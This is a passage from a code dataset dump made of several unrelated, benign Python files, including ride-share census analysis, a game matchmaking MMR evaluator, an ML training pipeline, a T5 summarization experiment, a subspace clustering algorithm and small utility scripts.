= pair\n c1idx = np.argwhere(header==c1)[0, 0]\n c2idx = np.argwhere(header==c2)[0, 0]\n data[np.argwhere(data[:, c1idx] < 0), c1idx] = 0\n data[np.argwhere(data[:, c2idx] < 0), c2idx] = 0\n\n # Total population for each census tract\n rtotal = data[:, c1idx] + data[:, c2idx]\n\n # Percentage of population of each census tract\n for ridx in range(data.shape[0]):\n if rtotal[ridx] != 0:\n data[ridx, c1idx] /= rtotal[ridx]\n data[ridx, c2idx] /= rtotal[ridx]\n\n else:\n data[ridx, c1idx] = 0\n data[ridx, c2idx] = 0\n\n added_header = []\n added_cols = []\n for pair in colpairs:\n keep, toss = pair\n kidx = np.argwhere(header==keep)[0, 0]\n col = data[:, kidx].reshape((-1, 1))\n added_header.append('%s Percentage' % keep)\n added_cols.append(col)\n\n header = np.concatenate([header, added_header])\n added_cols = np.hstack(added_cols)\n data = np.concatenate([data, added_cols], axis=1)\n\n for pair in colpairs:\n c1, c2 = pair\n\n c1idx = np.argwhere(header==c1)[0, 0]\n dargs = np.delete(np.arange(header.shape[0]), c1idx)\n header = header[dargs]\n data = data[:, dargs]\n\n c2idx = np.argwhere(header==c2)[0, 0]\n dargs = np.delete(np.arange(header.shape[0]), c2idx)\n header = header[dargs]\n data = data[:, dargs]\n\n cols = [\n \"Pickup Count\", \"Dropoff Count\", \n \"Non-White Percentage\", \"Generation X + Boomer + Silent Percentage\", \n \"High school diploma or less Percentage\", \"Below Poverty Line Percentage\", \n \"Not a U.S. citizen Percentage\", \"Below Median House Price Percentage\", \n ]\n\n spercs = set([\n \"Non-White Percentage\", \"Generation X + Boomer + Silent Percentage\",\n \"High school diploma or less Percentage\", \"Below Poverty Line Percentage\", \n \"Not a U.S. 
citizen Percentage\", \"Below Median House Price Percentage\"\n ])\n\n cidxs = np.asarray([np.argwhere(header==col)[0, 0] for col in cols if col in header])\n tidx = np.argwhere(header==biastype)[0, 0]\n\n eslists, xlists, titles = [], [], []\n for cidx in cidxs:\n titles.append(header[cidx])\n cargs = np.argsort(data[:, cidx])\n data = data[cargs]\n\n eslist, xlist, var_ds = [], [], []\n std = np.std(data[:, tidx])\n for ridx in range(1, data.shape[0]-1):\n nrval = np.mean(data[ridx:, tidx])\n rval = np.mean(data[:ridx, tidx])\n d = (rval - nrval) / std\n eslist.append(d)\n xlist.append(data[ridx, cidx])\n\n eslist = np.asarray(eslist)\n xlist = np.asarray(xlist)\n eslists.append(eslist)\n xlists.append(xlist)\n\n eslists = np.asarray(eslists)\n xlists = np.asarray(xlists)\n\n tnames = {\n 'Pickup Count': '# of pickups', \n 'Dropoff Count': '# of dropoffs', \n 'Non-White Percentage': '% of non-white pop', \n 'Generation X + Boomer + Silent Percentage': '% of >= 40 pop', \n 'High school diploma or less Percentage': '% of highschool educated or less pop', \n 'Below Poverty Line Percentage': '% below poverty line', \n 'Not a U.S. citizen Percentage': '% non-U.S. citizens', \n 'Below Median House Price Percentage': '% living in homes < median house price'\n }\n\n titles = [tnames[title] for title in titles]\n\n fig, axarr = plt.subplots(2, 4, figsize=(15, 7))\n\n ridx = cidx = 0\n for eidx in range(len(eslists)):\n eslist = eslists[eidx]\n xlist = xlists[eidx]\n axarr[ridx][cidx].plot(xlist, eslist)\n axarr[ridx][cidx].set_title(titles[eidx])\n if cidx >= 3: ridx +=1; cidx = 0\n else: cidx += 1\n\n plt.savefig(outpath, bbox_inches='tight')\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"akshat0123/RShareChicago","sub_path":"RShare/analysis/direction.py","file_name":"direction.py","file_ext":"py","file_size_in_byte":6604,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"26846623527","text":"import inhouse_bot.common_utils.lol_api.tasks as lol\nfrom typing import List, Dict, Tuple\nfrom inhouse_bot.database_orm import Game, GameParticipant\nfrom inhouse_bot.dataclasses.GameInfo import GameInfo\nfrom sqlalchemy import BigInteger\nimport logging\nfrom inhouse_bot.common_utils.fields import SideEnum, RoleEnum\n\n\nasync def find_team_and_lane_mmr(team: List[GameParticipant]) -> GameInfo:\n \"\"\"\n 1. Sum the MMR each team\n 2. Compare the MMR of each player and their lane opponent\n 3. 
Attempt to find the smallest possible difference among MMR\n \"\"\"\n\n mmrValues = {\n \"IRONIV\": 200,\n \"IRONIII\": 400,\n \"IRONII\": 800,\n \"IRONI\": 1000,\n \"BRONZEIV\": 1100,\n \"BRONZEIII\": 1150,\n \"BRONZEII\": 1250,\n \"BRONZEI\": 1300,\n \"SILVERIV\": 1400,\n \"SILVERIII\": 1450,\n \"SILVERII\": 1550,\n \"SILVERI\": 1600,\n \"GOLDIV\": 1700,\n \"GOLDIII\": 1750,\n \"GOLDII\": 1850,\n \"GOLDI\": 1900,\n \"PLATINUMIV\": 2000,\n \"PLATINUMIII\": 2050,\n \"PLATINUMII\": 2150,\n \"PLATINUMI\": 2200,\n \"DIAMONDIV\": 2300,\n \"DIAMONDIII\": 2350,\n \"DIAMONDII\": 2450,\n \"DIAMONDI\": 2500,\n \"MASTERI\": 2750,\n \"GRANDMASTERI\": 3000,\n \"CHALLENGERI\": 3250,\n }\n\n laneMMR = {(side, role): 0 for side in SideEnum for role in RoleEnum}\n\n blueTeamMMR = 0\n redTeamMMR = 0\n for gameparticipant in team:\n summoner = await lol.get_summoner_by_puuid(\n str(gameparticipant.player.summoner_puuid)\n )\n playerRankInfo = await lol.get_summoner_rank_info_by_id(summoner.id)\n\n if playerRankInfo:\n rankString = playerRankInfo[\"tier\"] + playerRankInfo[\"rank\"]\n value = mmrValues[rankString]\n else:\n value = mmrValues[\"BRONZEI\"]\n\n if gameparticipant.side == SideEnum.BLUE:\n blueTeamMMR += value\n\n elif gameparticipant.side == SideEnum.RED:\n redTeamMMR += value\n\n # Storing each players lane mmr\n laneMMR[(gameparticipant.side, gameparticipant.role)] = value\n\n teamMMR = abs(blueTeamMMR - redTeamMMR)\n teamMMRWithLane = teamMMR + get_lane_differential(laneMMR)\n\n logging.info(\n f\"Blue Team: {blueTeamMMR} | Red Team: {redTeamMMR} | TeamMMRDifferenceWithLane: {teamMMRWithLane}\"\n )\n return GameInfo(blueTeamMMR, redTeamMMR, teamMMRWithLane)\n\n\ndef get_lane_differential(laneMMR: Dict[Tuple[SideEnum, RoleEnum], int]) -> int:\n \"\"\"\n 1. 
Get each players opponent and attempt to put players of equal level against each other, if they queue for the same role\n \"\"\"\n topDiff = abs(\n laneMMR[(SideEnum.BLUE, RoleEnum.TOP)] - laneMMR[(SideEnum.RED, RoleEnum.TOP)]\n )\n\n jgDiff = abs(\n laneMMR[(SideEnum.BLUE, RoleEnum.JGL)] - laneMMR[(SideEnum.RED, RoleEnum.JGL)]\n )\n\n midDiff = abs(\n laneMMR[(SideEnum.BLUE, RoleEnum.MID)] - laneMMR[(SideEnum.RED, RoleEnum.MID)]\n )\n\n botDiff = abs(\n laneMMR[(SideEnum.BLUE, RoleEnum.BOT)] - laneMMR[(SideEnum.RED, RoleEnum.BOT)]\n )\n\n suppDiff = abs(\n laneMMR[(SideEnum.BLUE, RoleEnum.SUP)] - laneMMR[(SideEnum.RED, RoleEnum.SUP)]\n )\n return topDiff + jgDiff + midDiff + botDiff + suppDiff\n\n\nasync def evaluate_game(game: Game) -> GameInfo:\n teamsList = []\n teamsList.extend(game.teams.BLUE)\n teamsList.extend(game.teams.RED)\n\n return await find_team_and_lane_mmr(teamsList)\n","repo_name":"adamschachne/inhouse_bot","sub_path":"inhouse_bot/matchmaking_logic/evaluate_game.py","file_name":"evaluate_game.py","file_ext":"py","file_size_in_byte":3459,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"52"} +{"seq_id":"4045363169","text":"import math\nfrom functools import reduce\nfrom operator import mul\n\nimport cupy\nimport numpy\n\ntry:\n # try importing Cython-based private axis handling functions from CuPy\n if hasattr(cupy, \"_core\"):\n # CuPy 10 renames core->_core\n from cupy._core.internal import _normalize_axis_index # NOQA\n from cupy._core.internal import _normalize_axis_indices # NOQA\n else:\n from cupy.core.internal import _normalize_axis_index # NOQA\n from cupy.core.internal import _normalize_axis_indices # NOQA\n\nexcept ImportError:\n # Fallback to local Python implementations\n\n def _normalize_axis_index(axis, ndim): # NOQA\n \"\"\"\n Normalizes an axis index, ``axis``, such that is a valid positive\n index into the shape of array with ``ndim`` dimensions. Raises a\n ValueError with an appropriate message if this is not possible.\n Args:\n axis (int):\n The un-normalized index of the axis. Can be negative\n ndim (int):\n The number of dimensions of the array that ``axis`` should\n be normalized against\n Returns:\n int:\n The normalized axis index, such that\n `0 <= normalized_axis < ndim`\n \"\"\"\n if axis < 0:\n axis += ndim\n if not (0 <= axis < ndim):\n raise numpy.AxisError(\"axis out of bounds\")\n return axis\n\n def _normalize_axis_indices(axes, ndim): # NOQA\n \"\"\"Normalize axis indices.\n Args:\n axis (int, tuple of int or None):\n The un-normalized indices of the axis. 
Can be negative.\n ndim (int):\n The number of dimensions of the array that ``axis`` should\n be normalized against\n Returns:\n tuple of int:\n The tuple of normalized axis indices.\n \"\"\"\n if axes is None:\n axes = tuple(range(ndim))\n elif not isinstance(axes, tuple):\n axes = (axes,)\n\n res = []\n for axis in axes:\n axis = _normalize_axis_index(axis, ndim)\n if axis in res:\n raise ValueError(\"Duplicate value in 'axis'\")\n res.append(axis)\n\n return tuple(sorted(res))\n\n\nif hasattr(math, \"prod\"):\n prod = math.prod\nelse:\n\n def prod(iterable, *, start=1):\n return reduce(mul, iterable, start)\n","repo_name":"rapidsai/cucim","sub_path":"python/cucim/src/cucim/skimage/_vendored/_internal.py","file_name":"_internal.py","file_ext":"py","file_size_in_byte":2417,"program_lang":"python","lang":"en","doc_type":"code","stars":272,"dataset":"github-code","pt":"52"} +{"seq_id":"34118933706","text":"# -*- coding: utf-8 -*-\n\n##### Imports #####\nimport loading\nfrom modeling import modeling\nfrom evaluation import evaluation\nfrom utils import utils as u\nimport constants as cst\n\nimport pandas as pd\n\n##### Set Logger #####\nfrom src.utils.loggers import MainLogger\n\nlogger = MainLogger.getLogger(__name__)\n\n##### Processors #####\ndef main_model_training_pipeline() -> None:\n \"\"\"\n Loads and preprocesses the training data, trains and saves a model with\n optimal hyperparameters, computes training performance metrics, make\n predictions on the training set and saves results.\n \"\"\"\n sample_df = loading.load_training_data()\n\n train_model_pipeline(data=sample_df, predictions_path=cst.PREDICTED_TRAIN_FILE_PATH)\n\n\ndef train_model_pipeline(\n data: pd.DataFrame, predictions_path: str, model_name: str = \"\"\n) -> None:\n \"\"\"Launches a pipeline that trains a model based on the data passsed to it\n and saves the preprocessed data, model, training performances, and\n predictions.\n\n Args:\n data (pd.DataFrame): df containg the data on which the model will be\n trained.\n predictions_path (str): path where to save the predictions.\n model_name (str, optional):name of the model to be passed to the save\n model funcion. 
Defaults to \"\".\n \"\"\"\n # Preprocess and save training data\n data_preprocessed = cst.PREPROCESSOR(data, cst.column_types)\n save_preprocessed_training_data(data_preprocessed)\n\n # Train and save model\n model, _ = modeling.main_modeling_from_name(\n data_preprocessed.drop(columns=[cst.y_name]), data_preprocessed[cst.y_name]\n )\n u.save_model(model, name=model_name)\n\n # Compute and save model performance metrics\n training_performance_metrics = evaluation.cross_evaluate_model_performance(\n model,\n data_preprocessed.drop(columns=[cst.y_name]),\n data_preprocessed[cst.y_name],\n )\n u.save_training_performance_metrics(training_performance_metrics)\n\n # Make predictions on the training set and save results\n data_preprocessed_pred = make_predictions(model, data_preprocessed)\n loading.write_csv_from_path(data_preprocessed_pred, path=predictions_path)\n\n\ndef make_predictions(model, sample_df_preprocessed: pd.DataFrame) -> pd.DataFrame:\n \"\"\"Add predictions to the preprocessed dataset\n\n Args:\n model (Pipeline): trained model\n sample_df_preprocessed (pd.DataFrame): preprocessed data\n\n Returns:\n pd.DataFrame: preprocessed data with predicted labels and probabilities\n \"\"\"\n sample_df_preprocessed_pred = sample_df_preprocessed.copy()\n\n sample_df_preprocessed_pred[cst.y_pred] = model.predict(\n sample_df_preprocessed_pred.drop(cst.y_name, axis=1)\n )\n sample_df_preprocessed_pred[\n [\n f\"{cst.y_pred_proba}_{cst.y_class_labels[0]}\",\n f\"{cst.y_pred_proba}_{cst.y_class_labels[1]}\",\n ]\n ] = model.predict_proba(\n sample_df_preprocessed_pred.drop([cst.y_name, cst.y_pred], axis=1)\n )\n\n return sample_df_preprocessed_pred\n\n\ndef save_predicted_training_data(sample_df_preprocessed_pred: pd.DataFrame) -> None:\n \"\"\"Save training data with predicted labels and corresponding probabilities\n\n Args:\n sample_df_preprocessed_pred (pd.DataFrame): preprocessed train data \n with predicted labels and probabilities.\n \"\"\"\n loading.write_csv_from_path(\n sample_df_preprocessed_pred, cst.PREDICTED_TRAIN_FILE_PATH\n )\n\n\ndef save_preprocessed_training_data(sample_df_preprocessed: pd.DataFrame) -> None:\n \"\"\"Save preprocessed training data.\"\"\"\n loading.write_csv_from_path(\n sample_df_preprocessed, cst.PREPROCESSED_TRAIN_FILE_PATH\n )\n\n\nif __name__ == \"__main__\":\n # create and set up logger\n import logging\n\n logging.basicConfig(\n filename=cst.TRAINING_LOG_FILE_PATH, filemode=\"w\", level=logging.INFO\n )\n logger = logging.getLogger(__name__)\n\n main_model_training_pipeline()\n","repo_name":"henrique-britoleao/monitoring-project","sub_path":"src/train_model.py","file_name":"train_model.py","file_ext":"py","file_size_in_byte":3983,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"11927886305","text":"# Define the TABLE and its uppercase version\nTABLE = \"qwertyuiopasdfghjkl;zxcvbnm,./_\"\nTABLE = TABLE.upper()\nTABLE2 = \"QWERTYUIOPASDFGHJKL;ZXCVBNM,./\"\nTABLE3 = \"1234567890一二三四五六七八九十竹廾廿火乂手木人尸/\"\nTABLE4 = \"中乙貝心彎女刀日月口一二三四五六土八九十竹草散火插手木人耳空\"\n\n# Read the data from the file\nwith open(\"so61utf8.txt\", \"r\", encoding=\"utf-8\") as file:\n data = file.read()\n\n# Split the data into lines\nlines = data.split(\"\\n\")\n\n# Create a dictionary to map TABLE keys to characters\ntable_dict = {}\nfor line in lines:\n if line:\n key, value = line[:3], line[3:]\n key = key.strip()\n value = value.strip()\n for i, char in enumerate(value):\n # Use modulo to ensure cyclic access to TABLE characters\n 
replaced_key = key.replace('_', TABLE[i % len(TABLE)], 1)\n if char in table_dict:\n table_dict[char].append(replaced_key)\n else:\n table_dict[char] = [replaced_key]\n\n# Read the input string from stdin\ntry:\n input_str = input(\"Enter a string: \")\nexcept EOFError:\n print(\"EOF reached. Exiting.\")\n exit()\n\n# Process the input string and replace characters with TABLE keys\noutput_str = \"\"\nfor char in input_str:\n if char in table_dict:\n output_str += char + \" \" + \" \".join(table_dict[char]) + \"\\n\"\n else:\n output_str += char + \" (No TABLE key)\\n\"\n\n# Print the output\nprint(output_str)\n\n# Define the TABLE and its uppercase version\n# TABLE = \"qwertyuiopasdfghjkl;zxcvbnm,./_\"\n# TABLE = TABLE.upper()\nTABLE2 = \"QWERTYUIOPASDFGHJKL;ZXCVBNM,./﹏\"\nTABLE3 = \"1234567890一二三四五六七八九十竹廾廿火乂手木人尸/﹏\"\nTABLE4 = \"中乙貝心彎女刀日月口一二三四五六土八九十竹草散火插手木人耳空﹏\"\n\ndef replace_chars_with_tables(input_str):\n # Initialize the output string\n output_str = \"\"\n str3 = \"\"\n str4 = \"\"\n\n # Iterate over each character in the input_str\n for char in input_str:\n # Find the index of the character in TABLE\n index = TABLE.find(char)\n \n if index != -1:\n # Replace the character with the corresponding character from TABLE2, TABLE3, or TABLE4\n output_str += \" \" + TABLE2[index] \n str3 += \" \" + TABLE3[index] \n str4 += \" \" + TABLE4[index]\n else:\n # If the character is not in TABLE, keep it as is\n output_str += char\n str3 += char\n str4 += char \n return output_str, str3, str4\n\n# Test the function with your example\n# example = \"輸 ;U_\"\noutput_str2, out3, out4 = replace_chars_with_tables(output_str)\nprint(output_str2)\nprint(out3)\nprint(out4)\n\n\n\n","repo_name":"HexColors60/so61ime","sub_path":"str61code.py","file_name":"str61code.py","file_ext":"py","file_size_in_byte":2907,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"39767228843","text":"import datasets\nfrom transformers import T5ForConditionalGeneration, AutoTokenizer\nimport torch\nimport pickle\nimport evaluate\n\n\nxsum = datasets.load_dataset(\"xsum\")\n\nmodel_name = \"t5-base\"\ndevice = \"cuda\" if torch.cuda.is_available() else \"cpu\"\nt5_tokenizer = AutoTokenizer.from_pretrained(model_name)\nt5_model = T5ForConditionalGeneration.from_pretrained(model_name).to(device)\n\npreds, gts = [], []\ncounter = 0\nprefix = \"summarize: \"\nfor idx in range(xsum['test'].num_rows):\n batch = t5_tokenizer(prefix + xsum['test'][idx]['document'], truncation=True, padding=\"longest\", return_tensors=\"pt\").to(device)\n translated = t5_model.generate(**batch)\n tgt_text = t5_tokenizer.batch_decode(translated, skip_special_tokens=True)\n # data_idx = dataset['test'][idx]['id']\n preds.append(tgt_text[0])\n gts.append(xsum['test'][idx]['summary'])\n # counter += 1\n # if counter % 10 == 0:\n # print('done with test', counter)\n\nwith open('predictions_exp1', 'wb') as f:\n pickle.dump(preds, f)\nwith open('gts_exp1', 'wb') as f:\n pickle.dump(gts, f)\n\nrouge = evaluate.load(\"rouge\")\nresult = rouge.compute(predictions=preds, references=gts, use_stemmer=True)\nprint(result)","repo_name":"medhap02/DataContaminationResearch","sub_path":"experiment1.py","file_name":"experiment1.py","file_ext":"py","file_size_in_byte":1165,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"33008961611","text":"# Write a program to convert month name to the number of days correspondant to that 
month\r\n\r\nmonth=str(input(\"Input the Month name: \")) # Requests a string input from the user\r\nfeb=\"February has 28 or 29 days.\" # February is its own variable, as it is the only month with an entirely new, non-fixed value\r\na=[\"January\",\"March\",\"May\",\"July\",\"August\",\"October\",\"December\"] # Months with 31 days are grouped into a LIST\r\nb=[\"April\",\"June\",\"September\",\"November\"] # Months with 30 days are grouped into a second LIST\r\nif month==(\"February\"):\r\n print(feb) # If the month happens to be February, prints February's own message\r\nfor i in a: # My first use of a FOR loop, uses \"i\" as a temporary value to scan through the contents of list [a]\r\n if i==month: # When the temporary value \"i\" is the same as the user input as outlined in list [a], prints the 31 day message\r\n print(month,\"has 31 days.\")\r\nfor i in b:\r\n if i==month: # When the temporary value \"i\" is the same as the user input as outlined in list [b], prints the 30 day message\r\n print(month,\"has 30 days.\")\r\n# I found this to be a very troublesome piece of code when I was not aware of for loops, and very easy after having figured them out.\r\n","repo_name":"20220856/RR-20220856.github.io","sub_path":"Software-Development/Code/Python/month-name-to-days.py","file_name":"month-name-to-days.py","file_ext":"py","file_size_in_byte":1220,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"35061340236","text":"import os\nimport time\nimport copy\nimport numpy as np\nimport itertools\nimport scipy.linalg\nfrom numba import njit\nfrom tqdm import tqdm\nfrom karcher_mean import karcher_mean as km\nfrom draw_utils import draw_3d_clusters, draw_spiral_clusters\nfrom sklearn.neighbors import NearestNeighbors\nfrom multiprocessing import Pool\n\n\ndef d_hat(Ci, Cj):\n d_mean = d_geodesic(Ci.M, Cj.M)\n d = (len(Ci) + len(Cj)) * (d_mean ** 2) + 2 * d_mean * (Ci.d + Cj.d)\n return d\n\n\ndef d_geodesic(x, y):\n # Reference: http://dx.doi.org/10.1137%2FS1064827500377332 Page 3\n # This is unstable numerically but it should be fine here\n ua, sa, vha = scipy.linalg.svd(x)\n ub, sb, vhb = scipy.linalg.svd(y)\n ua_smaller = ua[:, :sa.shape[0]]\n ub_smaller = ub[:, :sa.shape[0]]\n QaTQb = np.dot(ua_smaller.T, ub_smaller)\n uQaTQb, sQaTQb, vhQaTQb = scipy.linalg.svd(QaTQb)\n sQaTQb.clip(0, 1, out=sQaTQb)\n thetas = np.arccos(sQaTQb)\n return np.linalg.norm(thetas, ord=2) ** 2\n\n\n@njit(cache=True)\ndef argmin_dissimilarity(D, l):\n \"\"\"\n Finds the argmin on a ndarray D which is supposed to be triu and with -1 for non valid distances\n l can be used to specify the actual size of the valid submatrix (for efficiency)\n \"\"\"\n n, m = D.shape\n l = m - l\n min_v = np.inf\n min_idx = (-1, -1)\n for i in range(n - l):\n for j in range(i, m - l):\n x = D[i, j]\n if x == -1:\n continue\n if x < min_v:\n min_v = x\n min_idx = (i, j)\n return min_idx\n\n\ndef delete_rowcolumn(D, i, l):\n \"\"\"\n Updates a distance matrix D by removing the row and column i\n It actually moves the row / column i to the end of the matrix so that\n there's no creation of a new array (more efficient)\n \"\"\"\n l = D.shape[0] - l\n e = -l + 1 if -l + 1 != 0 else D.shape[0]\n\n D[:i, i:-l] = D[:i, i + 1:e]\n D[i:-l, :i] = D[i + 1:e, :i]\n D[i:-l, i:-l] = D[i + 1:e, i + 1:e]\n D[-l, :] = -1\n D[:, -l] = -1\n return D\n\n\nclass Cluster:\n \"\"\"\n Class representing each cluster formed by the algorithm\n \"\"\"\n def __init__(self, X, points, indices, M=None):\n 
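# X: raw samples in the cluster; points: their local tangent bases (the\n        # d-rank SVD frames computed from each neighborhood); indices: positions\n        # of the samples in the dataset; M: Karcher mean of the bases (None\n        # until computed)\n        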
assert len(points) == len(indices)\n self.X = X\n self.points = points\n self.indices = indices\n self.F = None\n self.M = M\n self.d = 0\n\n def merge(self, other):\n self.X.extend(other.X)\n self.points.extend(other.points)\n self.indices.extend(other.indices)\n self.M = None\n self.d = None\n\n def update_mean(self, pool=None):\n iters = 3 if len(self.points) < 100 else 2 if len(self.points) < 250 else 1\n self.M = km(self.points, len(self.points), 1e-6, iters, pool) # TODO\n self.update_distance(pool=pool)\n\n def update_distance(self, pool=None):\n if pool is None:\n self.d = sum([d_geodesic(self.M, Mx) for Mx in self.points])\n else:\n self.d = sum(pool.starmap(d_geodesic, ((self.M, Mx) for Mx in self.points)))\n\n def __len__(self):\n return len(self.indices)\n\n\nclass ACDT:\n \"\"\"\n The ACDT algorithm for clustering\n \"\"\"\n def __init__(self, k, l, d, X, minimum_ckpt=100, store_every=0, visualize=False):\n \"\"\"\n k: number of neighbors during knn.\n l: number of target clusters.\n d: subspace dimensional size\n X: The dataset\n minimum_ckpt: if the number of clusters is < minimum_ckpt the checkpoints are saved\n ckpt_every: The interval between checkpoints (0 no checkpoints)\n \"\"\"\n self.n = X.shape[0]\n self.X = X\n self.k = k\n self.l = l\n self.d = d\n self.minimum_ckpt = minimum_ckpt\n self.store_every = store_every\n self.visualize = visualize\n self.checkpoints = {'knn': self.k, 'X': copy.deepcopy(self.X)}\n PROCESS = os.cpu_count()\n self.pool = Pool(processes=PROCESS)\n\n self.knn = NearestNeighbors(n_neighbors=self.k + 1, metric='euclidean').fit(X)\n k_indices = self.knn.kneighbors(X, return_distance=False)[:, 1:] # Compute k-nearest neighbors indices\n self.E = self.knn.kneighbors_graph(X).astype(np.int) # This is not used but is the edge map\n self.D = np.ones((self.n, self.n)) * -1\n\n self.C = []\n self.map_cluster = [] # Maps sample idx to cluster containing it\n for i, x in enumerate(X):\n Nx = X[k_indices[i]] # Take k neighbors\n N0x = (Nx - x).T # Translate neighborhood to the origin\n u_N0x, _, _ = scipy.linalg.svd(N0x, full_matrices=False)\n M = u_N0x[:, :d] # Take d-rank svd\n self.C.append(Cluster([x], [M], [i], M))\n self.map_cluster.append(self.C[-1])\n\n # Precompute all the distances and populate D\n print('Initializing the distances between clusters')\n pairs = {}\n for Ci in self.C:\n neigh = set(self.knn.kneighbors(Ci.X, return_distance=False)[:, 1:].flatten())\n neigh_c = set([self.map_cluster[n] for n in neigh])\n pairs[Ci] = [(Ci, Cj) if self.C.index(Ci) < self.C.index(Cj) else (Cj, Ci) for Cj in neigh_c if Ci != Cj]\n pairs = set(itertools.chain.from_iterable(pairs.values())) # Single list of pairs\n\n distances = self.pool.starmap(d_hat, pairs)\n for ith, (Ci, Cj) in enumerate(pairs):\n i, j = self.C.index(Ci), self.C.index(Cj)\n i, j = min(i, j), max(i, j) # So that we always populate upper part\n self.D[i, j] = distances[ith]\n print('Computed %s distances' % np.count_nonzero(self.D != -1))\n\n def fusible(self, Ci, Cj):\n \"\"\"\n To check if two clusters are fusible we have to see if there's an edge connecting them\n we can iterate on Ci and see if it is connected to any sample in Cj.\n\n This is not used as is very inefficient\n \"\"\"\n for i in Ci.indices:\n for j in Cj.indices:\n if self.E[i, j] == 1:\n return True\n return False\n\n def fit(self):\n for _ in tqdm(range(self.n, self.l, -1)):\n i, j = argmin_dissimilarity(self.D, len(self.C))\n if i == -1 or j == -1:\n print('No clusters can be merged, probably k is too low, 
stopping with %s clusters' % len(self.C))\n break\n i, j = min(i, j), max(i, j)\n Ci, Cj = self.C[i], self.C[j]\n\n # Save neighbors of Cj\n l = self.D.shape[0] - len(self.C)\n e = -l + 1 if -l + 1 != 0 else self.D.shape[0]\n ind_r = np.argwhere(self.D[:j, j] != -1)\n ind_c = np.argwhere(self.D[j, j + 1:e] != -1) + j + 1\n Cj_neigh = [self.C[idx.item()] for idx in itertools.chain(ind_r, ind_c)]\n\n self.C.remove(Cj)\n Ci.merge(Cj)\n Ci.update_mean(pool=self.pool)\n\n for s_idx in Cj.indices:\n self.map_cluster[s_idx] = Ci\n\n # Update distances\n self.D = delete_rowcolumn(self.D, j, len(self.C)) # Delete (offset all to left to skip it) column and row j\n\n # Now for each connection with Ci update the distance\n neigh = set(self.knn.kneighbors(Ci.X, return_distance=False)[:, 1:].flatten())\n Ci_neigh = set([self.map_cluster[n] for n in neigh])\n index_Ci = self.C.index(Ci)\n pairs = set((Ci, Cj) if index_Ci < self.C.index(Cj) else (Cj, Ci) for Cj in Ci_neigh if Ci != Cj)\n pairs.update((Ci, Cj) if index_Ci < self.C.index(Cj) else (Cj, Ci) for Cj in Cj_neigh if Ci != Cj)\n\n distances = self.pool.starmap(d_hat, pairs)\n for ith, (Ci, Cj) in enumerate(pairs):\n i, j = self.C.index(Ci), self.C.index(Cj)\n i, j = min(i, j), max(i, j) # So that we always populate upper part\n self.D[i, j] = distances[ith]\n\n if self.store_every != 0 and len(self.C) < self.minimum_ckpt and len(self.C) % self.store_every == 0:\n for Ci in self.C:\n samples = np.array(Ci.X).T\n mean_pos = np.mean(samples, axis=1, keepdims=True)\n C0mi = samples - mean_pos\n u_C0mi, _, _ = scipy.linalg.svd(C0mi, full_matrices=False)\n Ci.F = u_C0mi[:, :self.d]\n\n self.checkpoints[len(self.C)] = {'C': copy.deepcopy(self.C)}\n for Ci in self.checkpoints[len(self.C)]['C']: # To reduce the size on disk\n Ci.X = None\n Ci.points = None\n\n if self.visualize:\n if self.X.shape[1] == 2:\n draw_spiral_clusters(self.C, self.X, self.k)\n if self.X.shape[1] == 3:\n draw_3d_clusters(self.C, self.X)\n\n # Compute final flats\n for Ci in self.C:\n samples = np.array(Ci.X).T\n mean_pos = np.mean(samples, axis=1, keepdims=True)\n C0mi = samples - mean_pos\n u_C0mi, s, _ = scipy.linalg.svd(C0mi, full_matrices=False)\n Ci.F = u_C0mi[:, :self.d]\n","repo_name":"JunkyByte/ACDT","sub_path":"src/acdt.py","file_name":"acdt.py","file_ext":"py","file_size_in_byte":9126,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"9859553470","text":"import tkinter\n\nMY_FONT = (\"Arial\", 14, \"normal\")\n\nwindow = tkinter.Tk()\n\nwindow.title(\"Miles to km converter\")\n\nwindow.minsize(width=300, height=200)\n\nwindow.config(padx=50, pady=50)\n\n\ndef button_clicked():\n miles = entry.get()\n kms = int(int(miles) * 1.60934)\n label_res[\"text\"] = kms\n\n# Labels\nlabel_equal = tkinter.Label(text=\"is equal to\", font=MY_FONT)\nlabel_equal.grid(row=1, column=0)\nlabel_km = tkinter.Label(text=\"Km\", font=MY_FONT)\nlabel_km.grid(row=1, column=2)\nlabel_miles = tkinter.Label(text=\"Miles\", font=MY_FONT)\nlabel_miles.grid(row=0, column=2)\nlabel_res = tkinter.Label(text=\"0\", font=MY_FONT)\nlabel_res.grid(row=1, column=1)\n# Entry\nentry = tkinter.Entry(width=20)\nentry.grid(row=0, column=1)\n\n# Button\nbutton = tkinter.Button(text=\"Calculate\", command=button_clicked)\nbutton.grid(column=1, 
row=2)\n\n\nwindow.mainloop()\n","repo_name":"lucianomel/100DaysOfPython","sub_path":"day27/miles_to_km.py","file_name":"miles_to_km.py","file_ext":"py","file_size_in_byte":848,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"23141382739","text":"\n# TODO: support running C++ version\n# https://github.com/snakers4/silero-vad/tree/master/examples/cpp\n\nimport time\nfrom pprint import pprint\n\nimport torch\nimport numpy\nimport pandas\n\n\ndef get_frame_scores(audio: torch.Tensor,\n model,\n sampling_rate: int = 16000,\n window_size_samples: int = 512):\n\n \"\"\"\n Return frame-wise scores / probabilities\n\n Parameters\n ----------\n audio: torch.Tensor, one dimensional\n One dimensional float torch.Tensor, other types are casted to torch if possible\n\n model: preloaded .jit silero VAD model\n\n sampling_rate: int (default - 16000)\n Currently silero VAD models support 8000 and 16000 sample rates\n\n window_size_samples: int (default - 512 samples)\n Audio chunks of window_size_samples size are fed to the silero VAD model.\n WARNING! Silero VAD models were trained using 512, 1024, 1536 samples for 16000 sample rate\n and 256, 512, 768 samples for 8000 sample rate.\n Values other than these may affect model perfomance!!\n\n Returns\n ----------\n speeches: list of dicts\n list containing ends and beginnings of speech chunks (samples or seconds based on return_seconds)\n \"\"\"\n\n if not torch.is_tensor(audio):\n 